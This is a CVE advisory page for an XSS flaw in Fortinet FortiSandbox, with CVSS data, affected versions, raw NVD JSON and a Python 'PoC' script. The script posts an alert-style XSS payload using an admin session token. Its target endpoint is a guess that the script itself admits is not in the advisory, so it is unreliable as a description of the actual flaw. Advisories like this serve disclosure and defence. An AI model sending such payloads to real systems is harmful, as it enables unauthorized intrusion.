Security Vulnerability Report
CVE-2026-39812 CVSS 4.8 MEDIUM

CVE-2026-39812

Published: 2026-04-14 16:16:45
Last Modified: 2026-04-21 17:12:34

Description

An improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox PaaS 5.0.0 through 5.0.5, FortiSandbox PaaS 4.4.0 through 4.4.8, FortiSandbox PaaS 4.2 all versions may allow an attacker to execute unauthorized code or commands via <insert attack vector here>

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* (4.2.0 through 4.2.8) - VULNERABLE
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* (4.4.0 up to, but excluding, 4.4.9) - VULNERABLE
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* (5.0.0 up to, but excluding, 5.0.6) - VULNERABLE
cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:* (22.2.4134 through 23.1.4260) - VULNERABLE
cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:* (23.3.4329 through 24.1.4436) - VULNERABLE
cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.5:*:*:*:*:*:*:* - VULNERABLE
FortiSandbox 4.2 (All versions)
FortiSandbox 4.4.0 - 4.4.8
FortiSandbox 5.0.0 - 5.0.5
FortiSandbox PaaS 4.2 (All versions)
FortiSandbox PaaS 4.4.0 - 4.4.8
FortiSandbox PaaS 5.0.0 - 5.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-39812
# Vulnerability: Stored/Reflected XSS in Fortinet FortiSandbox
# Description: This script attempts to inject a malicious payload.
# Note: Requires authentication (PR:H) and a valid target endpoint.


def exploit_xss(target_url, session_token):
    headers = {
        "Cookie": f"session={session_token}",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # Malicious payload to test script execution
    xss_payload = "<img src=x onerror=alert('CVE-2026-39812')>"
    # Hypothetical vulnerable endpoint (e.g., file submission or log entry);
    # the advisory does not name the affected parameter or path.
    url = f"{target_url}/api/vuln_endpoint"
    data = {
        "description": xss_payload,
        "submit": "Submit",
    }
    try:
        response = requests.post(url, headers=headers, data=data, verify=False)
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[*] Check if the alert triggers when an admin views the page.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")


# Usage Example
# exploit_xss("https://<target-ip>", "<admin_session_token>")
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-110 (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-39812", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:45.490", "lastModified": "2026-04-21T17:12:33.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox PaaS 5.0.0 through 5.0.5, FortiSandbox PaaS 4.4.0 through 4.4.8, FortiSandbox PaaS 4.2 all versions may allow attacker to execute unauthorized code or commands via <insert attack vector here>"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndIncluding": "4.2.8", "matchCriteriaId": "814D77BE-F536-42DE-B068-F92B95D68248"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.9", "matchCriteriaId": "0025C9C0-8D61-4563-96F9-F4E09DD83B26"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.6", "matchCriteriaId": "3AAEF316-2134-4398-911C-E7532CD3AFF2"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "22.2.4134", "versionEndIncluding": "23.1.4260", "matchCriteriaId": "4ADBF898-6FFB-4DBF-AF54-67D431353496"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.3.4329", "versionEndIncluding": "24.1.4436", "matchCriteriaId": "C1D4D476-ECDB-453B-B69C-E9CD894B4FC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "E5E86B19-95E8-4107-85DC-EFE47225418C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "FDAB696D-20A1-4C1A-8DD6-FDECD560AC9C"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-110", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```